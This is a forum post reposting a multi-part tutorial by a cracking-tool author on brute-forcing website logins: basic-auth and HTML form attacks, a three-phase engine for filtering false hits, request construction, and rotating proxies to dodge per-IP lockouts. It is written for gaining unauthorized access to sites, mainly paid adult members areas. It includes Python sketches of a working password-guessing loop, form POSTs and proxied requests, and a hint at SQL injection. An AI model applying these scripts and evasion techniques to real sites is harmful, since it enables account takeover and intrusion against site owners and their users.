Brute Force Text by SSS

04-01-2005, 05:47 AM   #1
MoonDoggy

This is taken from another forum, written by Silver Sand Storm (SSS, the coder of Form@). It is excellent for beginners, intermediates, and "professional" crackers alike, lol.

Quote:
HTTP Bruteforce: A New Beginning

--------------------------------------------------------------------------------

Introduction


Hello,

This is the first of hopefully a series of posts on HTTP Bruteforcing.

The motivation for this post lies in the evolution of my own understanding on the subject, as well as my realizing that the way I view the subject is quite different from the way most people (especially non programmers) view it.

Since my views are the result of that evolution, I believe it will indeed benefit people to try this mode of thinking.

By the end of this series of posts, I should, for one, have demolished the supposed difference between popup (basic) HTTP auth and form-based bruteforcing.

This series should also provide a basis for people building programs in the future to use totally different designs....designs that not only are far more flexible and powerful, but also lead to the user learning as well as enjoying that learning.

It is my belief that many users of the tools I have written have been forced to think for themselves: they have been frustrated by failure, taken up the challenge to learn, and enjoyed that learning process.

And all that when their initial goal was merely to gain access to something or other.

If you enjoy reading this, thank Sl@yer and Flyer, whose suggestions made it easier to access and read.

Compares favorably to "Using form@ Effectively"
_________________
SSS
(version Infinity)



--------------------------------------------------------------------------------

The current state of Affairs


Let's start off with a brief recapitulation of the current thinking regarding HTTP bruteforcing.

People today categorize HTTP bruteforcing into two main categories:

1) Popup (basic auth)
2) HTML form bruteforcing

Both 1) and 2) are further subdivided into HTTPS (HTTP over SSL) sites and normal HTTP sites.

HTML form bruteforcing is further divided into
a) AVS style single login (no username, just password) style systems
b) Regular HTML forms with login and password
c) HTML forms with login, password, and a visually determined access key - what is often called an OCR key.


There exist programs to deal with every individual task from the list above. Some programs have multiple components, each dealing with one such system. E.g. AccessDiver, which has an HTTP popup (basic auth) bruteforcer and an HTML form bruteforcer as individual components.

For AVS, an example of a specialized bruteforcer would be the ancient (but still in use) Tyr. For HTML forms, HTTP Bugger or form@. For HTTPS popup, MultiHTTPS (and perhaps HTTPS forms too, I haven't tried). For OCR, Caecus.

That is the current state of affairs.




An analysis/critique of the current state of affairs

The current state of affairs really came about because a lot of people, at various points in time, decided that it would be cool to write a program that could bruteforce system X - where system X was the first system that came to their mind.

Most adult sites initially did seem to use popup auth - so that became the first target of the programmers. They basically wrote programs that could generate an HTTP header, add to it the basic authorization details, and check the response for acceptance of the authorization, or failure.

AVS systems also seemed to rear their ugly head around then - something that resulted in a few programs having either full AVS functionality or AVS components. Most of these couldn't do full-blown forms... just single-password (no username) AVS logins.

HTML forms were also a target of programmers... not too many of those forms were used by adult sites though; they were largely the domain of sites offering email or administration of various accounts.

Very often what happened was that a programmer built a basic auth bruteforcer, it worked well, and then users found there were forms out there that the program couldn't handle (it didn't support forms), and this resulted in a feature request... so the programmer added a form component. E.g. AD/WwwHack.

So right from the beginning, there was a basic lack of coherent, systematic thinking on the whole subject. This was the result of a "reactive" approach to security systems, rather than a proactive, positive approach. The idea was... react to the demand... rather than anticipate the demand and build your program to handle it.

This way of thinking explains why most bruteforce programs even today are still pretty sloppy. Sure, they are effective for very specific purposes, but that's it. They aren't flexible, nor are they usable across a broad range of systems.


The issue with OverSpecialized Programs

The basic problem with these programs, to repeat, is that they are overspecialized.

They have been developed with the idea of dealing with one very specific task.

They were then added to, piecemeal, to deal with other tasks.

A lot of the additions occurred without proper testing.

A lot of the additions made assumptions which may not hold (e.g. they didn't follow the RFCs/specifications fully).

That is one of the reasons we have programs like AD today with a LOT of specialized components - many of which don't work very well. Similarly with GE, Ares, WWWHack and many other tools.

So the real issue is with specialization - that is, the building of a tool/component to deal with a *very* specific task, and nothing more.

Specialization implies lack of flexibility and extensibility. It basically just means: component X can do task Y. No more, and very often less.


There is a different way to do things. Through the eyes of a person who knows. Who understands that the differences between the various tasks being undertaken are just superficial. Who understands that specialization is just the result of people not seeing the whole picture.


Flawed ViewPoint - The Users'


However, it isn't just the programs which are overfocused and lack a broader view of the whole subject.

It's the users too. The users lack a basic understanding of the subject. They basically pick up the smallest amount of learning that will enable them to start off. Everybody wants the quickest route to success, and ultimately, the quality of their understanding suffers.

As a result, most people don't really have a clue what they're doing. They understand how to tackle situation X... by using method Y. But how did they find that out? Either trial and error, or by asking somebody, or by reading it somewhere.

Adding to the confusion is the huge number of incorrect texts, partially descriptive texts (the truth but not the whole truth), posts which describe how to use tools - but not why - and poorly written texts which end up confusing users... and this spreads via the domino effect: one person ends up confusing dozens of others, and on and on and on.

A beautiful example is "Authentix encryption". Essentially what happened is that a couple of years back or so, people started spotting weird logs from a certain billing company (one of the two biggest, I guess). The company in question had a common log format with DES-encrypted passes. The weird logs had passes that users were unable to bruteforce with any tool (e.g. John the Ripper). Also, the users noticed that the authentication realm (shown during popup logins on the site) ended with "Secured by Authentix". So they assumed that Authentix was the software producing such logs, and called them "Authentix logs".

Unfortunately for them, they were totally off base. The logs were the result of the billing co switching to a new encryption format *on IIS - Windows-based systems alone!*, based on the Enigma rotors... because of one of two reasons - either to make things tougher for hackers, or because the normal DES crypt() code was unavailable to them on Windows. I think it's the latter, the company having a lousy security history... but I could be wrong.


So basically...we need to reset our understanding of this subject. Breathe deeply. And dive into it again, this time with the goal of understanding it from scratch.

Screw history.

So lets go!
_________________
SSS
(version Infinity)



--------------------------------------------------------------------------------

A New Beginning

So what is a new beginning all about?

Ultimately it's partially a fancy marketing phrase that catches your eye and captures your attention, like the idiot box does for too many people.

But it's also a statement of intent. A willingness to drop the closemindedness of the past and adopt a new approach to bruteforcing altogether.

It's something that you can use as a user. It's something that you can use as a programmer. It's something that you can use as a thinker.

So let us look at the basic definition of bruteforcing over HTTP again


A bruteforce over HTTP can be looked at as a series of steps:



1) Construct an HTTP request dynamically, given certain parameters. Some of these parameters remain the same every time this series of steps is run. Some change every time the sequence is run. Some change depending on other events (session expiry on the server side, for example).
Examples of parameters: CGI GET/POST parameters. Cookies. HTTP header fields like Authorization (used for popup auth), Proxy-Authorization (used for proxy auth), etc.



2) Read the HTTP response, and interpret it to place it in one of several predefined categories. The interpretation can be done in many ways. One way is keyword matching - checking whether a keyword is present in the response. Another is keyword + position matching - for example, consider the following response header:
HTTP/1.0 403 Forbidden
The response code is a keyword found immediately following HTTP/1.0 or HTTP/1.1, with only a space before it.
Another method is pattern matching... match the entire HTML response... compare it to the normal response you get for an HTTP request with the parameters set to values that you know will not get you the access you desire.

The categories could be - {Successful login, Failed login, Blocked login}
or could be {Parameter Accepted and unusable, Parameter blocked as being undesirable, Parameter Accepted and results in possible vulnerability}

or could be {File Not found, File found but not as expected, File found as expected, File found but not sure if it is the expected file, Internal server error...maybe file present, Forbidden}

And so on and so forth, depending on the purpose of your bruteforce attempt.



3) If the HTTP response and the resulting category require you to submit a fresh request with new parameters, do that. E.g. a redirection... load the new URL. Or in a bruteforce... the site tells you the username is invalid... swap the username and password and retry...


This series of steps is repeated as many times as required, with perhaps many instances (threads which execute this series) of such series being executed simultaneously, with merely different values for the parameter set. THAT is bruteforce.
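To make those three steps concrete, here is a minimal Python sketch - not Form@ code; the keyword lists, URL and credentials are invented placeholders:

Code:

# A minimal sketch of the three steps above. All names (keyword lists,
# target URL, credentials) are illustrative only.
import base64
import urllib.request, urllib.error

SUCCESS_KEYS = ["Welcome"]            # chosen per target by the user
FAILURE_KEYS = ["Invalid login"]
BLOCKING_KEYS = ["Too many attempts"]

def attempt(url, username, password):
    # Step 1: construct the request dynamically from the changing parameters.
    # Here the changing parameter is the Authorization header (popup auth).
    req = urllib.request.Request(url)
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    # Step 2: fetch the response (a 4xx also carries a readable body)...
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        body = e.read().decode(errors="replace")
    # ...and categorize it by simple keyword matching.
    for keys, label in [(SUCCESS_KEYS, "Successful login"),
                        (BLOCKING_KEYS, "Blocked login"),
                        (FAILURE_KEYS, "Failed login")]:
        if any(k in body for k in keys):
            return label
    return "Uncategorized"   # step 3 decides what fresh request to make

# The loop: the same steps, with different values for the parameter set.
for pw in ["alpha", "beta", "gamma"]:
    print(pw, attempt("http://www.example.com/members/", "user", pw))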


But is this definition complete?

Definitely not, there are some things to be added



Refining our definition of bruteforce

But what about OCR? Won't that require extra steps - maybe fetching a new URL (the image generator) for each request? What about preprocessing the image?


So lets redefine things.

Our possible primitives...or functions...or modules....consist of the following types

1) Creating and Submitting HTTP Requests
2) Fetching HTTP Responses
3) Parsing HTTP Headers & HTML Responses
4) Categorizing Responses based on various methods (recognizing visual or OCR codes is one example).


Is that too abstract a definition? A little.

So let's flesh it out with some reality.


Consider form@ (I coded it... so I know it inside out). I can and may do the same with some other app in the course of this set of posts.

Form@ can do both HTTP popup (basic auth) sites and form sites. Why? Because it doesn't differentiate between the two, except for the parameters REQUIRED to make the login attempt, and for detecting the kind of attack so that the right parameters are sent.

For example, consider entering a form OR popup (basic auth) URL in Form@ and clicking go.

It first uses Module #1 (Construct and Submit HTTP Request) to send an HTTP request to the server - a GET request that fetches that URL. It then uses Module #2, Fetching HTTP Responses. Then Module #3, Parsing HTTP and HTML Responses, to get it into a form that Form@ can understand. Then Module #4, Categorizing the Response.

Examples of categories:
1) No form on page
2) At least one form on page => load the form manager, display the forms, and allow the user to select the one to attack
3) HTTP response code 401 => popup auth required => auto-select the right URL, method (GET) and keywords (401 for failure, 403 for blocking, 200 for hit).

Now the *only* difference form@ applies when it detects the popup attack is to set itself up internally to use an extra HTTP header - Authorization. That is the header used to send popup (basic) HTTP authorization. And there are now no form variables to POST or GET. So it just does a GET on the URL itself without ANY variables (e.g. GET http://url, not GET http://url?login=blah).


Thus the user has the flexibility to attack both form and basic auth sites in the same fashion. The user can also specify keywords for the basic auth sites (as in Sentry), of all kinds - Failure, Blocking, Success.

Where then is the difference between form and basic auth sites?

Not in the program. The difference is in the way the user handles them - completely up to the user! Forms do require extra handling of issues like cookies.

However, the user now sees basic auth bruteforce as a simpler case of form bruteforcing. That is a vital difference. It destroys the obscurity in the user's understanding of popup bruteforcing!

An example will follow.


Camera Obscura, or the fake wisdom on Fakes

Everybody talks about fakes. Heck, somebody was telling me about the Thomas Crown Affair today, in which the Monet was a fake. Considering our domain to be bruteforcing... everybody talks about fakes....

So what the hell are fakes?

Fakes, the way most people define them, are username/password pairs...or to generalize it further, SPECIFIC values for a set of parameters
(e.g. w900 pins).

It could be
{username=blah, password=blah2, email address=blah2@blah.com} for example (toughie)
or
{password=1067blah}
etc.

There is one problem with these specific values. Even though the bruteforce program in question identifies them as valid for the access sought on the site, they aren't. In other words, they simply don't work!

I just read some excellent tutorials on getting rid of fakes. For those who took me literally: please read up on sarcasm. The texts in question showed that either the writers didn't know the full story about fakes, or knew it and wrote crap out of laziness.

So let's talk about fakes, using our definition from above. Further, let's restrict it to an AVS-style system, where we are bruteforcing one password (the system doesn't matter - it could be ANY such system... AVS is simplest, saves my finger flesh).
We are using program X, we have set it up as we wished, and we are getting passwords which don't work. For now, let's assume the program has no fake detection built in.

Let's assume that our Module #1, Construct and Submit HTTP Request, is fine. Otherwise every attempt will result in a `fake`, so we would know right away and change the construction of the request (variables used, POST/GET/HEAD, cookies, etc).

Also assuming we are using proxies - one proxy for each request, rotating.

WHAT DO WE DO???

We think.

Why could the program be getting passwords which don't work?

Simple: either the response from the site isn't as expected, OR we are not categorizing it properly - an invalid-password response or blocked response is being seen as a successful response.


Quote:

(I) Response from the site isn't as expected - what could have happened?
a) The proxy server sent us an unexpected response
This could be because the proxy server failed to get the response from the site (network or other error). OR the proxy server will not work on any request to this site (either the site is one of its blocked sites, or it's not a proxy server but a webserver, or the proxy server requires authorization, or it's down, etc).
So both cases need to be handled {#1 and #2}. Note them down. Done?
Let's continue.

b) The site sent us an incomplete response... or some random error occurred (network error, or the site went down...)
Again, needs handling. {#3}

c) (RARE) The site could not handle the exact password we sent it. Perhaps the password had invalid characters? (hint: SQL injection) This is VERY rare. But it happens. And it should be looked for - it's a nice way in.
Needs user-based handling.



Quote:

(II) Incorrect categorization
a) The site has sent us a new response which we didn't bargain for. Example: expired account! Or a different failed-login page (password too short!)
What's to be done? Add the keywords to the list... or improve our categorization.

b) The site has set up a random blocking mechanism, as described in one of my other essays somewhere. It is basically throwing random errors as a way to try to defeat bruteforce programs. For example, it could just output a random HTTP response code, and load a random ad banner from an affiliate.
So, another thing to be handled. {#4}




So how do we handle these? Onward!


Handling Fakes, or Finessing the Faker with finesse!

Or finishing the faker with finesse

So let's look at how a program would handle fakes.
A program would need to handle fakes by handling {#1} to {#4}.
Now at this stage, I must acknowledge the efforts of a much reviled individual (I will not pass judgement on to what extent the reviling was deserved) called Jean. He had quite a nice idea regarding fake detection (implemented rather badly in code).
Ultimately I refined it a little, and implemented it in form@ with some additional conditions.
Finally, this is the way it stands...

Quote:

Phase I
=>If
a) Failure keys absent, Success keys absent, Blocking keys absent: mark it as a possible hit and deal with it. Don't check further.
b) Success keys present: mark it as a possible hit and deal with it. Don't check further.
c) Blocking keys present: mark it as a *block* and add 1 to the # of blocked responses from the proxy used.
d) Failure keys present: mark it as a miss and move on to the next password in the list.
=>If it's a possible hit, move into Phase II.



Quote:

Phase II
=>Do :-
i) Generate a random password (long enough to definitely not work) and send it to the site; read the response.
ii) If the response yields a possible hit using a) or b) from above, then something's wrong! A random pass yielding a possible hit too! Obviously a fake of some sort! Flag the proxy for faking and retry the original pass X with the next proxy from the list.
iii) If the response yields a blocked response from c) above, then rotate proxies and try the random pass (why not pass X? Because of Phase III, which does just that again).
iv) If the response yields a MISS from d) above, then great! That's expected! Move on to Phase III.


Quote:

Phase III
=>Do :-
i) Redo Phase I.
ii) If the response gives us a possible hit using a) or b) from above, then we are in! Mark it as a genuine hit!
iii) If the response yields a blocking from c) above, then ouch - seems unlikely - but who knows, it may happen - so just redo the whole process from scratch with a new proxy.
iv) If the response yields a miss from d) above, then obviously Phase I gave us a wrong response. But that wrong response came only once. So chances are it was due to a network error or a (temporary) site error. So treat it as a miss and move on. (This can be refined to deal with the weird case of Phase I giving us success keys present but Phase III giving us those absent.)


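Here's what those three phases might look like in Python - a sketch only; `try_pass` is a stand-in for one full keyword-categorized attempt (Phase I logic), and the proxy rotation itself is left out:

Code:

# A sketch of the three-phase fake check above. `try_pass` is a hypothetical
# function performing one attempt and returning "hit", "miss", or "block".
import secrets

def check_candidate(try_pass, password):
    # Phase I: the normal attempt.
    if try_pass(password) != "hit":
        return "miss or block"
    # Phase II: a long random pass that cannot possibly work.
    verdict = try_pass(secrets.token_hex(24))
    if verdict == "hit":
        return "fake - rotate proxy, retry pass"            # rule ii)
    if verdict == "block":
        return "blocked - rotate proxy, retry random pass"  # rule iii)
    # Phase II was the expected miss; Phase III: redo Phase I.
    return "genuine hit" if try_pass(password) == "hit" else "miss"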

So...when can this fail and give us a fake pass?
This requires
=>Phase I - hit
=>Phase II - miss
=>Phase III - hit
So both Phase I and Phase III need to be hits, although the pass doesn't work. And Phase II needs to be a miss.

There are three possibilities
Quote:

1) Phase II is a miss if no failure keys are in use and the response is incomplete... so ensure the user uses at least ONE failure key.

2) Phase II is a miss if the user's failure keys are present on pages other than the missed-login page (e.g. a blocked page or network error page). So... the user MUST use unique failure keys.

3) Phase II is a legitimate miss
a) Phase I is a legitimate hit, but somehow the pass got locked out after that, either on the Phase II try or Phase III ===> Very rare. Requires a smart, hardworking, hacker webmaster. Find me ONE such!

b) Phase I and Phase III were responses SPECIFICALLY for that combo - locked out, etc => the user can easily detect such cases if the response is logged. Then add a new category... blocked-combo keys (didn't do it in form@).

c) Phase I and Phase III were both network errors => RARE! and Phase II worked!



So...look at the chances of failing...pretty low!
Quoting...
Code:

iii) If the response yields a blocked response from c) above, then rotate proxies and try the random pass (why not Phase I? Because of Phase III which does just that again ;))


Now Phase III would ensure that the pass was indeed valid. Some risks in there too...this is a route to getting some fakes, but very low probability. So a safer way might be to go to Phase I again with the proxy.

Now lets relook at this fake engine with respect to the cases I covered above (proxy errors, site errors etc!).



Continuing the Fake Engine Analysis
Quoting
Code:

The #1-#4 cases to be handled.
(I) Response from the site isn't as expected - what could have happened?

a) The proxy server sent us an unexpected response
This could be because the proxy server failed to get the response from the site (network or other error). OR the proxy server will not work on any request to this site (either the site is one of its blocked sites, or it's not a proxy server but a webserver, or the proxy server requires authorization, or it's down, etc).

So both cases need to be handled {#1 and #2}. Note them down. Done?
Let's continue.

b) The site sent us an incomplete response... or some random error occurred (network error, or the site went down...)

Again, needs handling. {#3}

(II) Incorrect categorization

b) The site has set up a random blocking mechanism, as described in one of my other essays somewhere. It is basically throwing random errors as a way to try to defeat bruteforce programs. For example, it could just output a random HTTP response code, and load a random ad banner from an affiliate.

So another thing to be handled. {#4}



Our analysis :-
Quote:

#1 => Proxy failed to get the response from the site. This is clearly handled. Why? Let's say it fails for Phase I and Phase II. Then the program will rotate proxies. If it fails for Phase I and Phase III but not Phase II... that's weird, d00d! It's unlikely to happen, but it will fake us. If it fails for Phase II alone, that will automatically cause the program to rotate proxies.

#2 => Proxy will fail Phase I and II, and thus get auto-rotated.

#3 => Error from the site. Just a random error, won't repeat. If it happens at Phase I only, then Phase III will give us a miss and set things right. If it happens at Phase II, then Phase II may report incorrectly as a hit; the proxy will be rotated and things will resume as expected. If it happens only at Phase II, and Phase II incorrectly reports a miss, then we can get a fake. But think of the likelihood of Phase I and Phase III being hits (because of the site blocking the proxy IP) and Phase II hitting such an error. Again, low.

#4 => Site is blocking randomly... it has to block Phase I and Phase II and let Phase III through for a possible hit. Phase I and Phase II would appear to be hits if the failure keys were absent (success keys, if chosen well, can't be present). Again, the probability is lowww! Chances are it may send us to random URLs, but on each attempt - so Phase II would also give us a hit. Note this is blocking by proxy IP.



So all cases are handled. There are some possible error pressure points. That's for future improvement.

Obviously, the onus is on the user to choose
1) Success keywords (if any)
2) Failure keywords (ENOUGH OF THEM!)
3) Blocking keywords (ANY and ALL unique ones, one per blocking page)

--------------------------------------------------------------------------------

Fake Engine Concluded
So before I move on beyond this fake engine, let me answer a couple of possible queries.

Quote:

1) Won't this method of testing passes multiple times kill proxies?
Yes it will. On the other hand, proxies are cheap. Passes to that tough bitch of a site aren't. If proxies ever become valuable (e.g. a site which allows 1 attempt per IP), then you will have to modify your approach.

2) Won't it kill working passes?
Working passes will die if used from multiple IPs at a time. So this may happen if
=>Phase I hit
and either
=>Phase II miss
=>Phase III error => rotate proxies and redo from the start
or
=>Phase II error => rotate proxies and go to Phase I or Phase II again.



1) The first case can be avoided by retrying on Phase III errors, and if they repeat, adding the pass to a special *maybe hit* list to be retried after a specific time interval.

2) The second case can be handled by retrying on Phase III errors and, if they repeat, blah blah as above.


Form@ does neither of the above. The likelihood of either isn't high, of course. But it's nonzero.

So... is this the best fake engine? The ideal fake engine? Uber H4xorTech? L33tness beyond description? The all-weather wunderdog?

No. (At least not the wunderdog!)
It is just one fake engine.
It works against the majority of sites. But it has its defects, and they have nonzero probabilities of occurrence!

Example of a flaw: let's say we have a site allowing n attempts per IP (e.g. vBB). Then every extra attempt costs you! Far better to get a list of hits including fakes without using the fake engine (ah yes, the form@ fake engine is togglable!) and then filter them with another run at the site.

So what the hell is my point? I've spent an hour writing about fake engines, and you've spent as long or longer reading?

My object has been :-

1) I want YOU to understand what a *fake* is - for the first time ever, you may understand that most people don't have a clue what a *fake* really is.
2) I want YOU to understand how I came up with a generic fake engine for form@.
3) I want YOU to understand where this engine fails - or at least, that this engine CAN fail and DOES fail.
4) I want YOU to understand that NOTHING can ever be used for all sites. There will always be sites left out. Sites which perform badly. Weird cases.

In short
Your above reading has been almost useless. Except for one thing. It has given you


UNDERSTANDING!



Also...it has shown you how easy it is to accept a method as being the right way to do something, and ignore the flaws.

PS: It has also been fun leading you up the garden path on the previous post

Where do we go from here?

Now, fake engines are *after the request* checkers. All they really do is handle the tasks of *parsing the response* and *categorizing it*, reusing the *construct and send request* machinery as a hack.


What about the request construction itself?

Any HTTP request consists of the following elements

Quote:

1) Method => GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE, SEARCH, CONNECT... etc.

2) URL => also called URI or `link`. In the form
protocol://serveraddress/path?QUERYSTRING

=>protocol can be http, https, ftp, etc.
=>serveraddress can be a fully qualified domain name (just a ruddy hostname, can have a subdomain) or an IP address.
=>path is the path to the file on that server

3) Header fields => a set of Key: Value fields
Basically saying Key1=Value1, Key2=Value2, etc.
E.g. Host: www.google.com (Host=www.google.com)

4) QUERYSTRING as in #2 => any input to be passed to the file at /path
e.g. a=b&c=d&e=f&g=h

5) BODY => this can be a POST's input, or a binary body, for example when uploading or POSTing a file.



All of these are under our control (they better be!)
A question hits us.
How do we *construct* a HTTP request for our bruteforce?
Answer: Depends on what we want to do!

Lets cover a few examples now


Basic (Popup) Auth


Method => GET, POST, PUT, HEAD - all will work. Any {request method, URL} combination can be protected by basic authorization.
As long as the URL in question supports the specified method. Note that if the method isn't supported, the site will throw a 405 Method Not Allowed HTTP error, so you can't try bruteforcing using a method the script doesn't support... that won't throw a 401 (Authorization Required).

URL => URL to attack.

Headers =>
=>Host: servername e.g. Host: deny.de
=>User-Agent: USERAGENT e.g. User-Agent: Mozilla/6.0 (helps identify the browser)
=>Authorization: Basic <auth>, where <auth> = Base64(username:password), e.g. Base64("moocow:movies"). Opinionatedgeek.com has a nice online base64 encoder/decoder.

The word Basic shows that it is basic (base64) auth.


All other headers are optional. We add some to make the request look like the request a normal browser would generate. That isn't really necessary.

If we are doing a POST, there will be a POST body. Unlikely to be used, so I'm not covering it right now - refer to the section below (form auth) if curious.
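Putting those headers together, an illustrative raw request in Python might look like this (host and credentials are the placeholders from above; the path is invented):

Code:

# Illustrative raw basic auth request with exactly the header set above.
import base64, socket

host, user, pw = "deny.de", "moocow", "movies"
auth = base64.b64encode(f"{user}:{pw}".encode()).decode()
request = (
    f"GET /members/ HTTP/1.0\r\n"
    f"Host: {host}\r\n"
    f"User-Agent: Mozilla/4.0 (compatible)\r\n"
    f"Authorization: Basic {auth}\r\n"
    f"\r\n"                      # blank line: end of the headers
)
with socket.create_connection((host, 80), timeout=10) as s:
    s.sendall(request.encode())
    print(s.recv(4096).split(b"\r\n", 1)[0])
    # e.g. b'HTTP/1.1 401 Authorization Required' on a miss,
    # b'HTTP/1.1 200 OK' on a hit.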



Form based Auth

Form-based auth can be done via only 2 request methods - POST and GET. Why not any others? Primarily because that's what these methods are intended to be used for.

Look at it this way. Basic auth can be used to *protect* any method+URL.
POST and GET are required to even *do* form auth.

POST and GET are essentially used to do form auth with URLs which are not just HTML pages, but Server Side Scripts (SSSs) written in scripting languages like ASP, PHP, CFM for ColdFusion, JSP, Perl, C, etc.

Now somebody out there is going to read this and say "What the heck, I've seen this form whose action (the URL to POST/GET) is index.html or login.html. How can that be?"

Simple... PHP is one example of a scripting language that can be embedded in HTML. That is, a PHP script consists of blocks of PHP code and HTML text. The PHP code is rendered (interpreted) or executed by the server when displaying the page, and the HTML blocks are just displayed directly.

The httpd.conf of such servers (on Apache, obviously) is set up to allow even .html files to be processed by the PHP interpreter. If the file has no PHP blocks, nothing is lost, because it's just displayed directly by the interpreter, which is all that is wanted.

So now, we have GET/POST sending input or user supplied data to a script. The url of the script is labelled "Form Action".

The input is in the form

variable1=value1&variable2=value2&variable3=value3 ..... and so on

It's basically a set of {variableX=valueX} pairs separated by & (ampersands).

Now this input - let's call it $Input - can be passed to a GET / POST in the following way :-
1) GET
Just make the request GET url?$Input instead of plain GET url

2) POST
The http request becomes
Quote:

POST url HTTP/1.x
Header1: value1
Header2: value2
.
.
.
HeaderN: valueN

$Input


Note the extra blank line after the end of the header fields... that's how the server detects the end of the headers, and thus where the input body begins.

So now our problem is reduced to the following questions :-

1) Which method do we use - GET or POST?
The HTML form generally has it in the <form> tag, e.g.
<form method = "POST" action = "posting.php">

If it doesn't *explicitly* state the method, the HTML default is GET - and that holds even when the form is submitted via JavaScript (somewhere you'll see a document.forms[1].submit() or something of the sort; submit() uses the form's method attribute, defaulting to GET). So read the JavaScript, but trust the method attribute.

2) Which URL (action) do we use?
The HTML form tag, again as above, has an action specified.
If not, JavaScript might be used to specify a form action => read the JavaScript and figure it out.
If not, the form action is the *same* URL as the URL of the page that the form is found on.

3) What HTTP headers do we use?
The Host header needs to be the servername of the url. The Referer needs to be the url on which the form is found. Others are more or less free, with one additional fixed header for POSTs:
Content-Type: application/x-www-form-urlencoded

just to let the server know this is form data coming along in the Body (body is the section AFTER the http header) of your request

Other headers can be used to emulate the browser of choice. Of course, if you want true emulation of IE, you might also want to make them non RFC (specifications) compliant

4) What Input do we use?
Crucial question. We need to understand how HTML form data gets converted into input.
HTML forms may have text fields, password fields, drop down lists, radio boxes, checkboxes, Submit type buttons, Image type buttons, even file upload dialogs (lets ignore those for now, we aren't going to upload a file everytime we login ) Oh and lets not forget hidden tags.

Each such field/form element has a Name. The value is user supplied in the following manner :-
Quote:

text/password fields : the value is the user entered string
hidden fields: the value is specified in the html tag itself.
checkboxes: value is 1 if checked, if unchecked I believe the checkbox is just ignored if I recall correctly.
Drop down list: every entry in the list has a corresponding value field with a pre-entered value. That is used.
radiobuttons: a group of radiobuttons which represent one choice is setup this way - each radiobutton has the same Name, but a different value from the others. On selecting one, the value assigned to the radiobutton group Name is the selected radiobutton's value from the html tag for it.



Now just cluster the {Name=Value} pairs, add the & (ampersands) in between, and the input is constructed.

So we now know how to construct form login requests too.
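As a sketch, here's the clustering plus the POST wrapper in Python (field names, URL and host invented; note that urlencode also percent-escapes special characters, and that servers generally expect a Content-Length header with a POST body - two details the description above glosses over):

Code:

# Sketch: cluster {Name=Value} pairs into $Input, wrap it in a POST.
from urllib.parse import urlencode

fields = {"login": "moocow", "password": "movies", "remember": "1"}
body = urlencode(fields)   # login=moocow&password=movies&remember=1
request = (
    "POST /login.php HTTP/1.0\r\n"
    "Host: www.example.com\r\n"
    "Referer: http://www.example.com/index.html\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(body)}\r\n"
    "\r\n"        # the extra blank line that ends the header fields
    + body
)
print(request)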

Proxy Auth

Just for fun Free bonus!

Look up popup auth. Rename the Authorization field to
Quote:

Proxy-Authorization



Use any URL which should give you an HTTP 200 (an unprotected URL).

All else remains the same. Only now the responses are HTTP 407s (Proxy Authorization Required) instead of HTTP 401s.

--------------------------------------------------------------------------------

So Whats the BIG deal about these Requests?

Nothing.

There's a specification, and it's very well documented. There are tons of programs which use the specification and which can be monitored to examine the data sent, in case you're too lazy to read the specs, or they are written too cryptically.

All it requires is a little effort, and building the request you need to accomplish the goal in mind is ...ridiculously easy!


So..since I have nothing else to discuss under the Request head, I might as well make a digression and answer a couple of other questions.

IFAQ
InFrequently Asked Questions, or phonetically speaking a proposition

Q) Am I selling form@ a little bit too much?
A) Perhaps so. Obviously form@ is a partial implementation of my way of thinking. So if I'm selling you my way of thinking - which is to be able to do everything for yourself, no matter what it is - I'm indirectly selling you form@.
However, this isn't exclusive. There are many other tools which are pretty decent. I just can't comment on *how* decent, and it doesn't matter. If you pick up the ability to do things on your own, you will not remain tied to form@ or any other tool, and their limitations. Examples of such tools might include Sentry, MultiHTTPs, HTTPBugger, HScanner, etc.

Q) Isn't this a little tough for somebody new?
A) If you're new, and there's anything you don't understand, there's a post for comments on this thread. If not, save your energy.

Q) Why is form@ `final`?
A) You should have figured that out by now... if you've really been riding the mood of this thread. If not... hang in there, there's more to come.

Q) You have discussed, and continue to discuss, micro-techniques, e.g. the fake engine. Are the techniques you present the best way to do things?
A) No. Perfection is not something you can ever achieve. That being said, the idea of discussing them is to show you how simple it is to really create such techniques - rather, to rediscover such techniques on your own. Once you've been there, it's much easier to go back.

Q) Is this over?
A) Will it ever be?

--------------------------------------------------------------------------------

What Next?

Now we come to yet another area of interest to bruteforcers of all sort, of every shape and size.

And that is, avoiding detection, as well as evading IP address based filters (N login tries from 1 ip results in that IP being blocked).

The most common technique to do so is to use a list of proxy servers.

Let's start off by nitpicking on one definition here. When we say proxy servers, we usually mean HTTP proxy servers. Those are proxy servers that support the HTTP protocol. They may also support the HTTPS protocol, and FTP via the GET method.

A proxy server is basically a piece of software running on some computer on the web, which accepts a HTTP request, processes it, performs the request, and fetches the HTTP response, processes it, and passes it back to the requesting machine.

So how does one use a proxy server to execute a HTTP request?

All one needs to do to use a proxy server is execute the following sequence

1) Connect to the proxy server on the port specified
2) Send in a modified HTTP request
3) Read the response

The only differences between this and a normal non proxied HTTP request is that we connect to the proxy server on the port specified, rather than the site, port 80 (or whichever port the HTTP server is running on), and that the request is modified a little.

How is the request modified?
In the case of the unproxied request, the URL used is the relative path only (it doesn't contain the server name OR the protocol string).

i.e. the request reads
GET /movies HTTP/1.0 (unproxied case)
rather than
GET http://www.clonedcowporn.com/movies HTTP/1.0 (proxied case).

There is no real reason for this. It just is. (Just like the internet!)
If the above URL belongs to you, it is in extremely bad taste. Despite that, we are not discussing an attack on it in any fashion. So go away!

There are other *possible* differences in the HTTP request. For example, you can ask the proxy server not to cache the response to your request. You can ask it to keep the connection to the remote server alive, so you can pump in a series of requests (HTTP pipelining). That way, the remote server can just keep pumping the responses back to you, without waiting for you to send a new request each time. This helps a lot when loading HTML pages, for example... just read the URLs of all images on the page, pipeline the requests, and render them as they come down, without wasting time re-requesting.
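As a quick sketch, here's the proxied form of such a request in Python (the proxy address is invented; the target host is a neutral placeholder):

Code:

# Sketch of a proxied GET: connect to the proxy, use the absolute URL.
import socket

proxy = ("203.0.113.7", 8080)    # hypothetical HTTP proxy
request = (
    "GET http://www.example.com/movies HTTP/1.0\r\n"   # absolute URL: proxied form
    "Host: www.example.com\r\n"
    "\r\n"
)
with socket.create_connection(proxy, timeout=10) as s:
    s.sendall(request.encode())
    print(s.recv(4096).split(b"\r\n", 1)[0])   # status line as the proxy relays it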


